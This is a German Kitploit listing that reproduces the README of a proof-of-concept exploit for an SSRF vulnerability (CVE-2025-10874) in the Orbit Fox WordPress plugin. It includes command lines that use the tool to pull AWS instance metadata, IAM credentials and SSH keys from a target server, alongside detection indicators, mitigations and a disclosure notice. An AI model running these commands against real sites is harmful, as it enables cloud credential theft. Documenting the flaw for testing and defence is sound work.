Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Orbit-Fox_SSRF_CVE-2025-10874 — Demonstriert SSRF mit Null-Byte-Injection-Bypass für CVE-2025-10874 | Kitploit
Tools/GitHubGitHub/ryanmroth/orbit-fox_ssrf_cve-2025-10874
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubryanmroth/orbit-fox_ssrf_cve-2025-10874

Orbit-Fox_SSRF_CVE-2025-10874

Demonstriert SSRF mit Null-Byte-Injection-Bypass für CVE-2025-10874

Repository anzeigen
2vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

alt text

CVE-2025-10874 - Orbit Fox SSRF Proof of Concept

Proof of Concept-Exploit, der die Server-Side Request Forgery (SSRF)-Schwachstelle im Orbit Fox WordPress-Plugin mit Null-Byte-Injection-Bypass demonstriert.

Ausführlicher Blogbeitrag: https://ryanmroth.com/articles/orbit-fox-ssrf

Schwachstellendetails

DetailHinweise
CVE-ID:CVE-2025-10874
Betroffenes Plugin:Orbit Fox von ThemeIsle
Schwachstellentyp:Server-Side Request Forgery (SSRF) (CWE-918)
CVSS-Score:5.5 (mittel)
Erforderliche Rechte:Autor+ (WordPress-Autorenrolle oder höher
Behobene Version3.0.2+

Beschreibung

Die MyStock-Importfunktion des Orbit Fox-Plugins enthält eine SSRF-Schwachstelle, die es authentifizierten Benutzern mit Autor+-Rechten ermöglicht, beliebige HTTP-Anfragen vom WordPress-Server aus zu senden. Die Schwachstelle besteht in der AJAX-Aktion handle-request-mystock-import, die URL-Parameter nicht ordnungsgemäß validiert und bereinigt.

Der Exploit nutzt eine Null-Byte-Injection-Bypass (%00.txt), um die URL-Validierung zu umgehen und Zugriff auf interne Metadaten-Dienste, Cloud-Provider-APIs und andere vom Server erreichbare Netzwerkressourcen zu ermöglichen.

Häufige Angriffsszenarien

AWS EC2-Metadatenextraktion

  • Instanz-Hostname: http://169.254.169.254/latest/meta-data/hostname
  • IAM-Anmeldeinformationen: http://169.254.169.254/latest/meta-data/iam/security-credentials/
  • SSH-öffentliche Schlüssel: http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

Installation

Anforderungen

  • Python 3.7+
  • requests-Bibliothek
  • urllib3-Bibliothek

Einrichtung

root@kitploit:~
# Repository klonen
git clone <repository-url>
cd Orbit-Fox_SSRF_CVE-2025-10874

# Abhängigkeiten installieren (mit uv)
uv sync

# Oder mit pip
pip install requests urllib3

Verwendung

Grundlegende Verwendung

root@kitploit:~
# AWS-Instanz-Hostname extrahieren (Standardziel)
python orbit_fox_poc.py http://target.com -u author -p password123

# Benutzerdefinierte SSRF-Ziel-URL angeben
python orbit_fox_poc.py http://target.com -u author -p password123 \
  -s http://169.254.169.254/latest/meta-data/hostname

Erweiterte Beispiele

root@kitploit:~
# IAM-Rollen-Anmeldeinformationen extrahieren
python orbit_fox_poc.py http://target.com -u author -p password123 \
  -s http://169.254.169.254/latest/meta-data/iam/security-credentials/

# SSH-öffentlichen Schlüssel extrahieren
python orbit_fox_poc.py http://target.com -u author -p password123 \
  -s http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

# Ohne Null-Byte-Bypass testen (schlägt bei gepatchten Versionen fehl)
python orbit_fox_poc.py http://target.com -u author -p password123 --no-nullbyte

# Debug-Ausgabe zur Fehlerbehebung aktivieren
python orbit_fox_poc.py http://target.com -u author -p password123 --debug

Befehlszeilenoptionen

root@kitploit:~
positional arguments:
  target                Ziel-WordPress-URL (z. B. http://example.com)

required arguments:
  -u, --username        WordPress-Benutzername (Autor+-Rolle erforderlich)
  -p, --password        WordPress-Passwort

optional arguments:
  -h, --help            Hilfemeldung anzeigen und beenden
  -s, --ssrf-url        URL, die per SSRF angefordert werden soll
                        (Standard: http://169.254.169.254/latest/meta-data/hostname)
  --no-nullbyte         Null-Byte-Bypass deaktivieren (nur grundlegende SSRF testen)
  --debug               Debug-Ausgabe zur Fehlerbehebung aktivieren

Funktionsweise

  1. Authentifizierung: Authentifiziert sich mit den bereitgestellten Anmeldeinformationen bei WordPress
  2. Nonce-Abruf: Extrahiert das Sicherheits-Nonce aus dem WordPress-Admin-Panel
  3. Null-Byte-Injection: Fügt %00.txt an die Ziel-URL an, um die Validierung zu umgehen
  4. SSRF-Ausführung: Sendet eine manipulierte Anfrage an den AJAX-Endpunkt handle-request-mystock-import
  5. Inhaltsabruf: Ruft die abgerufenen Inhalte aus der WordPress-Medienbibliothek ab und zeigt sie an

Erkennung

Protokollindikatoren

  • Ungewöhnliche ausgehende HTTP-Anfragen an Metadaten-Dienste (169.254.169.254)
  • Anfragen an admin-ajax.php mit der Aktion handle-request-mystock-import
  • WordPress-Medienbibliothek-Uploads von internen/Metadaten-URLs

Gegenmaßnahmen

  • Orbit Fox auf Version 3.0.2 oder höher aktualisieren
  • Strikte Egress-Filterung auf dem WordPress-Server implementieren
  • Zugriff auf Cloud-Metadaten-Endpunkte überwachen und einschränken
  • Benutzerrollen überprüfen und Autor+-Rechte einschränken

Verantwortungsvolle Offenlegung

Diese Schwachstelle wurde dem Hersteller verantwortungsvoll gemeldet und in Orbit Fox Version 3.0.2 behoben. Dieses Proof of Concept wird bereitgestellt für:

  • Sicherheitsforschung und -tests
  • Schwachstellenbewertung autorisierter Systeme
  • Bildungszwecke

Rechtlicher Haftungsausschluss

NUR FÜR AUTORISIERTE SICHERHEITSTESTS

Dieses Tool dient ausschließlich Bildungs- und autorisierten Sicherheitstestzwecken. Unautorisierter Zugriff auf Computersysteme ist illegal. Benutzer müssen:

  • Vor dem Testen eine ausdrückliche schriftliche Genehmigung einholen
  • Das Tool nur auf Systemen verwenden, die ihnen gehören oder für die sie eine Testgenehmigung haben
  • Alle geltenden Gesetze und Vorschriften einhalten

Der Autor übernimmt keine Haftung für Missbrauch dieses Tools.

Referenzen

  • Ursprüngliche Schwachstelle Alex Sanford – CVE-2023-2287
  • CVE-Details: CVE-2025-10874
  • Plugin-Repository: Orbit Fox von ThemeIsle
  • AWS-Metadaten-Dienst: Instance Metadata Service

Zuletzt aktualisiert: 2025-10-06

Tool herunterladen